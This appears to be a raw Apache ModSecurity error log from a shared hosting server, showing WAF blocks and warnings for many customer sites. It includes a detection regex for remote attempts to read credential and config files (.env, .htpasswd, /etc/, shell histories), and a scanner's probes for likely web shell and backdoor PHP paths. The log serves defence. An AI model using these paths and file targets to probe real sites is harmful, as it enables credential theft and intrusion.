[Tue May 26 16:25:49.248229 2026] [security2:error] [pid 795941:tid 796144] [client 2.57.122.173:41186] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/secrets/.env"] [unique_id "ahV8Ne2GQ_TLE_VHIp2gmQAAAM4"]
[Tue May 26 16:25:50.196490 2026] [security2:error] [pid 795941:tid 796077] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Ne2GQ_TLE_VHIp2gnQAAAIs"]
[Tue May 26 16:25:50.974927 2026] [security2:error] [pid 795941:tid 796149] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Nu2GQ_TLE_VHIp2grgAAANM"]
[Tue May 26 16:25:51.508845 2026] [security2:error] [pid 795941:tid 796079] [client 86.141.152.189:62208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8N-2GQ_TLE_VHIp2gywAAjTc"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:51.936768 2026] [security2:error] [pid 795941:tid 796101] [client 86.141.152.189:62208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8N-2GQ_TLE_VHIp2g3wAAo38"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:52.251466 2026] [security2:error] [pid 795941:tid 796198] [client 86.141.152.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8OO2GQ_TLE_VHIp2g5gAAAQQ"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:52.513468 2026] [security2:error] [pid 795941:tid 796114] [client 86.141.152.189:62208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8OO2GQ_TLE_VHIp2g7wAAsEI"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:52.651035 2026] [security2:error] [pid 795941:tid 796029] [remote 74.7.241.58:33704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV8OO2GQ_TLE_VHIp2g-gAA51c"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:25:53.122107 2026] [security2:error] [pid 795941:tid 796078] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8OO2GQ_TLE_VHIp2g8AAAAIw"]
[Tue May 26 16:25:54.369571 2026] [security2:error] [pid 795941:tid 796148] [client 212.47.68.125:45756] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahV8Ou2GQ_TLE_VHIp2hEQAAANI"]
[Tue May 26 16:25:54.949559 2026] [security2:error] [pid 795941:tid 796166] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Ou2GQ_TLE_VHIp2hHQAAAOQ"]
[Tue May 26 16:25:56.398262 2026] [security2:error] [pid 795941:tid 795993] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8PO2GQ_TLE_VHIp2hRwAAsjM"]
[Tue May 26 16:25:56.398471 2026] [security2:error] [pid 795941:tid 796116] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8PO2GQ_TLE_VHIp2hRwAAsjM"]
[Tue May 26 16:25:57.053704 2026] [security2:error] [pid 795941:tid 796087] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8PO2GQ_TLE_VHIp2hRgAAAJU"]
[Tue May 26 16:25:58.943873 2026] [security2:error] [pid 795941:tid 796075] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Pu2GQ_TLE_VHIp2haAAAAIk"]
[Tue May 26 16:26:01.017799 2026] [security2:error] [pid 795941:tid 796172] [client 170.168.97.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8QO2GQ_TLE_VHIp2hoQAAAOo"], referer: http://anujtradingco.com/
[Tue May 26 16:26:01.287776 2026] [security2:error] [pid 795941:tid 796106] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8QO2GQ_TLE_VHIp2hlQAAAKg"]
[Tue May 26 16:26:03.065707 2026] [security2:error] [pid 795941:tid 796110] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Qu2GQ_TLE_VHIp2hvwAAAKw"]
[Tue May 26 16:26:03.094302 2026] [security2:error] [pid 795941:tid 796151] [client 114.119.137.184:59757] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/parent-category/child-category-01/"] [unique_id "ahV8Q-2GQ_TLE_VHIp2hzwAAANU"], referer: http://rohiniventures.com/blog/category/parent-category
[Tue May 26 16:26:03.549363 2026] [autoindex:error] [pid 795941:tid 796051] [remote 31.133.0.235:28349] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:26:04.203465 2026] [security2:error] [pid 795941:tid 796103] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Q-2GQ_TLE_VHIp2h3QAAAKU"]
[Tue May 26 16:26:05.430604 2026] [security2:error] [pid 795941:tid 796110] [client 20.226.60.108:35174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV8Re2GQ_TLE_VHIp2iAAAAAKw"]
[Tue May 26 16:26:05.430772 2026] [security2:error] [pid 795941:tid 796110] [client 20.226.60.108:35174] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV8Re2GQ_TLE_VHIp2iAAAAAKw"]
[Tue May 26 16:26:05.864207 2026] [security2:error] [pid 795941:tid 796132] [client 20.226.60.108:15553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV8Re2GQ_TLE_VHIp2iCwAAAMI"]
[Tue May 26 16:26:05.864287 2026] [security2:error] [pid 795941:tid 796132] [client 20.226.60.108:15553] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahV8Re2GQ_TLE_VHIp2iCwAAAMI"]
[Tue May 26 16:26:06.255971 2026] [security2:error] [pid 795941:tid 796076] [client 20.226.60.108:59053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV8Ru2GQ_TLE_VHIp2iFwAAAIo"]
[Tue May 26 16:26:06.256055 2026] [security2:error] [pid 795941:tid 796076] [client 20.226.60.108:59053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV8Ru2GQ_TLE_VHIp2iFwAAAIo"]
[Tue May 26 16:26:06.650828 2026] [security2:error] [pid 795941:tid 796108] [client 20.226.60.108:60697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahV8Ru2GQ_TLE_VHIp2iHgAAAKo"]
[Tue May 26 16:26:06.650927 2026] [security2:error] [pid 795941:tid 796108] [client 20.226.60.108:60697] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahV8Ru2GQ_TLE_VHIp2iHgAAAKo"]
[Tue May 26 16:26:06.960112 2026] [security2:error] [pid 795941:tid 796092] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Ru2GQ_TLE_VHIp2iGgAAAJo"]
[Tue May 26 16:26:07.050632 2026] [security2:error] [pid 795941:tid 796157] [client 20.226.60.108:37711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahV8R-2GQ_TLE_VHIp2iKAAAANs"]
[Tue May 26 16:26:07.050752 2026] [security2:error] [pid 795941:tid 796157] [client 20.226.60.108:37711] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahV8R-2GQ_TLE_VHIp2iKAAAANs"]
[Tue May 26 16:26:07.591476 2026] [security2:error] [pid 795941:tid 796144] [client 20.226.60.108:26865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahV8R-2GQ_TLE_VHIp2iLQAAAM4"]
[Tue May 26 16:26:07.591618 2026] [security2:error] [pid 795941:tid 796144] [client 20.226.60.108:26865] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahV8R-2GQ_TLE_VHIp2iLQAAAM4"]
[Tue May 26 16:26:07.975636 2026] [security2:error] [pid 795941:tid 796197] [client 20.226.60.108:12549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahV8R-2GQ_TLE_VHIp2iNAAAAQM"]
[Tue May 26 16:26:07.975758 2026] [security2:error] [pid 795941:tid 796197] [client 20.226.60.108:12549] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahV8R-2GQ_TLE_VHIp2iNAAAAQM"]
[Tue May 26 16:26:08.408658 2026] [security2:error] [pid 795941:tid 796115] [client 20.226.60.108:60681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahV8SO2GQ_TLE_VHIp2iPwAAALE"]
[Tue May 26 16:26:08.408806 2026] [security2:error] [pid 795941:tid 796115] [client 20.226.60.108:60681] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahV8SO2GQ_TLE_VHIp2iPwAAALE"]
[Tue May 26 16:26:08.590014 2026] [security2:error] [pid 795941:tid 796136] [client 74.7.228.9:57470] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.bramas.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV8SO2GQ_TLE_VHIp2iSQAAxmY"]
[Tue May 26 16:26:08.668780 2026] [security2:error] [pid 795941:tid 796172] [client 74.7.228.3:39390] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.bramas.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV8SO2GQ_TLE_VHIp2iSwAA6mA"]
[Tue May 26 16:26:08.819536 2026] [security2:error] [pid 795941:tid 796155] [client 20.226.60.108:54221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahV8SO2GQ_TLE_VHIp2iTwAAANk"]
[Tue May 26 16:26:08.819647 2026] [security2:error] [pid 795941:tid 796155] [client 20.226.60.108:54221] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahV8SO2GQ_TLE_VHIp2iTwAAANk"]
[Tue May 26 16:26:09.022727 2026] [security2:error] [pid 795941:tid 796175] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8SO2GQ_TLE_VHIp2iQgAAAO0"]
[Tue May 26 16:26:09.210756 2026] [security2:error] [pid 795941:tid 796095] [client 20.226.60.108:59041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file3.php"] [unique_id "ahV8Se2GQ_TLE_VHIp2iWQAAAJ0"]
[Tue May 26 16:26:09.210861 2026] [security2:error] [pid 795941:tid 796095] [client 20.226.60.108:59041] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file3.php"] [unique_id "ahV8Se2GQ_TLE_VHIp2iWQAAAJ0"]
[Tue May 26 16:26:09.357379 2026] [security2:error] [pid 795941:tid 796179] [client 74.7.244.7:35500] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.adityacreations.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV8Se2GQ_TLE_VHIp2iXQAAAPE"]
[Tue May 26 16:26:09.608378 2026] [security2:error] [pid 795941:tid 796099] [client 20.226.60.108:60759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV8Se2GQ_TLE_VHIp2iZQAAAKE"]
[Tue May 26 16:26:09.608511 2026] [security2:error] [pid 795941:tid 796099] [client 20.226.60.108:60759] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV8Se2GQ_TLE_VHIp2iZQAAAKE"]
[Tue May 26 16:26:10.014989 2026] [security2:error] [pid 795941:tid 796159] [client 20.226.60.108:2581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2icwAAAN0"]
[Tue May 26 16:26:10.015114 2026] [security2:error] [pid 795941:tid 796159] [client 20.226.60.108:2581] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2icwAAAN0"]
[Tue May 26 16:26:10.139174 2026] [security2:error] [pid 795941:tid 795980] [remote 74.7.241.15:54352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-summons.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2idgAAlCY"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:26:10.405944 2026] [security2:error] [pid 795941:tid 796149] [client 20.226.60.108:53828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2igAAAANM"]
[Tue May 26 16:26:10.406049 2026] [security2:error] [pid 795941:tid 796149] [client 20.226.60.108:53828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2igAAAANM"]
[Tue May 26 16:26:10.487254 2026] [security2:error] [pid 795941:tid 796124] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Se2GQ_TLE_VHIp2ibgAAALo"]
[Tue May 26 16:26:10.854269 2026] [security2:error] [pid 795941:tid 796126] [client 20.226.60.108:2205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/.dj/index.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2ijgAAALw"]
[Tue May 26 16:26:10.854395 2026] [security2:error] [pid 795941:tid 796126] [client 20.226.60.108:2205] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/.dj/index.php"] [unique_id "ahV8Su2GQ_TLE_VHIp2ijgAAALw"]
[Tue May 26 16:26:11.187556 2026] [security2:error] [pid 795941:tid 796064] [remote 211.23.68.235:25182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV8S-2GQ_TLE_VHIp2ikAAAzHo"]
[Tue May 26 16:26:11.274881 2026] [security2:error] [pid 795941:tid 796111] [client 20.226.60.108:37732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahV8S-2GQ_TLE_VHIp2inAAAAK0"]
[Tue May 26 16:26:11.274992 2026] [security2:error] [pid 795941:tid 796111] [client 20.226.60.108:37732] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahV8S-2GQ_TLE_VHIp2inAAAAK0"]
[Tue May 26 16:26:11.697327 2026] [security2:error] [pid 795941:tid 796118] [client 20.226.60.108:18489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahV8S-2GQ_TLE_VHIp2ipwAAALQ"]
[Tue May 26 16:26:11.697470 2026] [security2:error] [pid 795941:tid 796118] [client 20.226.60.108:18489] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahV8S-2GQ_TLE_VHIp2ipwAAALQ"]
